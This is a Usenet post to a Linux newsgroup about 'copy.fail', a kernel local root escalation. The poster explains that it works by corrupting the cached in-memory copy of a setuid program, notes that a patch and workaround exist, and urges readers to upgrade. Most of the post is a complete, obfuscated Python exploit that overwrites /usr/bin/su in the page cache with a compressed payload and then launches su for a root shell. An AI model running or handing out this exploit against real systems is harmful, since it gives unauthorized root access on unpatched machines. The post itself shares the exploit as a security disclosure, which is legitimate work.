Path: csiph.com!weretis.net!feeder9.news.weretis.net!panix!.POSTED.panix5.panix.com!qz!not-for-mail
From: Eli the Bearded <*@eli.users.panix.com>
Newsgroups: comp.os.linux.misc
Subject: copy.fail
Date: Thu, 30 Apr 2026 05:40:55 -0000 (UTC)
Organization: Some absurd concept
Message-ID: <eli$2604300130@qaz.wtf>
Injection-Date: Thu, 30 Apr 2026 05:40:55 -0000 (UTC)
Injection-Info: reader1.panix.com; posting-host="panix5.panix.com:166.84.1.5"; logging-data="13031"; mail-complaints-to="abuse@panix.com"
User-Agent: Vectrex rn 2.1 (beta)
X-Liz: It's actually happened, the entire Internet is a massive game of Redcode
X-Motto: "Erosion of rights never seems to reverse itself." -- kenny@panix
X-US-Congress: Moronic Fucks.
X-Attribution: EtB
XFrom: is a real address
Encrypted: double rot-13
Xref: csiph.com comp.os.linux.misc:86022

This is an instant local escalation to root that works on about nine
years of kernel versions across many, if not all, distros. It's been
patched, very recently, and there is a work-around.

There's a write up at 

https://copy.fail/ 

It works by corrupting the in-memory copy of a program with suid bits,
so no change to the on-disk copy, but relying on multiple processes
hitting the same in memory file cache. The corruption happens becuase
of a kernel bug.

And an example script, under one kilobyte, written for python3 (3.10 or
higher), for reasonable portablity:

https://copy.fail/exp


#!/usr/bin/env python3
import os as g,zlib,socket as s
def d(x):return bytes.fromhex(x)
def c(f,t,c):
 a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o)
 try:u.recv(8+t)
 except:0
f=g.open("/usr/bin/su",0);i=0;e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))
while i<len(e):c(f,i,e[i:i+4]);i+=4
g.system("su")


That script's style makes me think the authors may like Perl.

Elijah
------
sleep tight and upgrade your stuff